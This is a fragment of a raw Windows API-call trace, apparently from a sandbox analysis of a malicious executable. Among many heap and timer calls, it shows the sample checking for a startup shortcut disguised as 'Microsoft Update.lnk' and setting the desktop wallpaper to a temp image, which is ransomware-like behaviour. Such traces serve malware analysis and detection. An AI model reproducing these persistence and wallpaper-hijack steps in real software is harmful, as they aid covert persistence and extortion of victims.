hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0231.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0231.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0231.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0231.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0231.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0231.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0231.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0231.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0231.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0231.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0231.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0231.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0231.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0231.480] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0231.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0231.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0231.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0231.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0231.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0231.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0231.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0231.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0231.481] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0231.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0231.481] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0231.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0231.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0231.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0231.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0231.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0231.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0231.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0231.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0231.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0231.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0231.481] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0231.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0231.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0231.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0231.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0231.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0231.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0231.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0231.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0231.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0231.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0231.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0231.482] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0231.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0231.482] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0231.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0231.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0231.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0231.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0231.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0231.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0231.482] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0231.482] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0231.482] timeGetTime () returned 0x1179d96 [0231.482] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.482] Sleep (dwMilliseconds=0xa) [0231.537] timeGetTime () returned 0x1179dd4 [0231.537] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.537] Sleep (dwMilliseconds=0xa) [0231.583] timeGetTime () returned 0x1179e03 [0231.583] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.583] Sleep (dwMilliseconds=0xa) [0231.630] timeGetTime () returned 0x1179e32 [0231.630] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.630] Sleep (dwMilliseconds=0xa) [0231.651] timeGetTime () returned 0x1179e43 [0231.651] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.651] Sleep (dwMilliseconds=0xa) [0231.680] timeGetTime () returned 0x1179e61 [0231.680] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.680] Sleep (dwMilliseconds=0xa) [0231.694] timeGetTime () returned 0x1179e71 [0231.694] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.694] Sleep (dwMilliseconds=0xa) [0231.719] timeGetTime () returned 0x1179e80 [0231.719] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.719] Sleep (dwMilliseconds=0xa) [0231.740] timeGetTime () returned 0x1179e9f [0231.740] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.740] Sleep (dwMilliseconds=0xa) [0231.755] timeGetTime () returned 0x1179eaf [0231.755] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.755] Sleep (dwMilliseconds=0xa) [0231.772] timeGetTime () returned 0x1179ebf [0231.772] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.772] Sleep (dwMilliseconds=0xa) [0231.788] timeGetTime () returned 0x1179ece [0231.788] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.788] Sleep (dwMilliseconds=0xa) [0231.806] timeGetTime () returned 0x1179ede [0231.806] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.806] Sleep (dwMilliseconds=0xa) [0231.817] timeGetTime () returned 0x1179eee [0231.817] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.817] Sleep (dwMilliseconds=0xa) [0231.833] timeGetTime () returned 0x1179efd [0231.833] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.833] Sleep (dwMilliseconds=0xa) [0231.849] timeGetTime () returned 0x1179f0d [0231.849] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.849] Sleep (dwMilliseconds=0xa) [0231.864] timeGetTime () returned 0x1179f1c [0231.864] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.864] Sleep (dwMilliseconds=0xa) [0231.880] timeGetTime () returned 0x1179f2c [0231.880] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.880] Sleep (dwMilliseconds=0xa) [0231.896] timeGetTime () returned 0x1179f3c [0231.896] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.896] Sleep (dwMilliseconds=0xa) [0231.911] timeGetTime () returned 0x1179f4b [0231.911] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.911] Sleep (dwMilliseconds=0xa) [0231.927] timeGetTime () returned 0x1179f5b [0231.927] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.927] Sleep (dwMilliseconds=0xa) [0231.944] timeGetTime () returned 0x1179f6b [0231.944] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.944] Sleep (dwMilliseconds=0xa) [0231.958] timeGetTime () returned 0x1179f7a [0231.958] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0231.958] TranslateMessage (lpMsg=0x8cf798) returned 0 [0231.958] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0231.958] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0231.958] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0231.958] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.958] Sleep (dwMilliseconds=0xa) [0231.973] timeGetTime () returned 0x1179f8a [0231.973] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.974] Sleep (dwMilliseconds=0xa) [0231.991] timeGetTime () returned 0x1179f99 [0231.991] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.991] Sleep (dwMilliseconds=0xa) [0232.005] timeGetTime () returned 0x1179fa9 [0232.005] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.005] Sleep (dwMilliseconds=0xa) [0232.020] timeGetTime () returned 0x1179fb9 [0232.020] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.020] Sleep (dwMilliseconds=0xa) [0232.040] timeGetTime () returned 0x1179fcb [0232.040] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.040] Sleep (dwMilliseconds=0xa) [0232.124] timeGetTime () returned 0x117a016 [0232.124] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.124] Sleep (dwMilliseconds=0xa) [0232.145] timeGetTime () returned 0x117a036 [0232.145] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.145] Sleep (dwMilliseconds=0xa) [0232.163] timeGetTime () returned 0x117a045 [0232.163] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.163] Sleep (dwMilliseconds=0xa) [0232.178] timeGetTime () returned 0x117a055 [0232.178] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.178] Sleep (dwMilliseconds=0xa) [0232.193] timeGetTime () returned 0x117a065 [0232.193] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.193] Sleep (dwMilliseconds=0xa) [0232.210] timeGetTime () returned 0x117a074 [0232.210] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.210] Sleep (dwMilliseconds=0xa) [0232.223] timeGetTime () returned 0x117a084 [0232.224] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.224] Sleep (dwMilliseconds=0xa) [0232.239] timeGetTime () returned 0x117a093 [0232.239] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.239] Sleep (dwMilliseconds=0xa) [0232.255] timeGetTime () returned 0x117a0a3 [0232.255] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.255] Sleep (dwMilliseconds=0xa) [0232.270] timeGetTime () returned 0x117a0b3 [0232.270] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.270] Sleep (dwMilliseconds=0xa) [0232.286] timeGetTime () returned 0x117a0c2 [0232.286] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.286] Sleep (dwMilliseconds=0xa) [0232.301] timeGetTime () returned 0x117a0d2 [0232.301] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.301] Sleep (dwMilliseconds=0xa) [0232.318] timeGetTime () returned 0x117a0e2 [0232.318] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.318] Sleep (dwMilliseconds=0xa) [0232.333] timeGetTime () returned 0x117a0f1 [0232.333] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.333] Sleep (dwMilliseconds=0xa) [0232.349] timeGetTime () returned 0x117a101 [0232.349] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.349] Sleep (dwMilliseconds=0xa) [0232.364] timeGetTime () returned 0x117a110 [0232.364] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.364] Sleep (dwMilliseconds=0xa) [0232.380] timeGetTime () returned 0x117a120 [0232.380] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.380] Sleep (dwMilliseconds=0xa) [0232.396] timeGetTime () returned 0x117a130 [0232.396] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.396] Sleep (dwMilliseconds=0xa) [0232.411] timeGetTime () returned 0x117a13f [0232.411] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.411] Sleep (dwMilliseconds=0xa) [0232.429] timeGetTime () returned 0x117a151 [0232.429] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.429] Sleep (dwMilliseconds=0xa) [0232.459] timeGetTime () returned 0x117a16e [0232.459] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.459] Sleep (dwMilliseconds=0xa) [0232.473] timeGetTime () returned 0x117a17e [0232.473] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0232.473] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0232.474] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0232.474] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0232.474] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x4e0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0232.474] RegSetValueExW (in: hKey=0x4e0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0232.474] RegCloseKey (hKey=0x4e0) returned 0x0 [0232.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a731e8 | out: hHeap=0x2af0000) returned 1 [0232.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0232.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0232.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0232.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0232.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0232.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0232.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0232.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0232.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0232.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0232.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0232.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0232.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0232.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0232.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0232.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0232.475] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0232.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0232.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0232.475] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0232.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0232.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0232.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0232.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72338 [0232.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0232.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0232.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0232.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0232.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72368 [0232.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0232.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0232.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0232.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0232.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0232.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0232.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0232.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0232.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0232.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0232.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0232.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab698 [0232.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 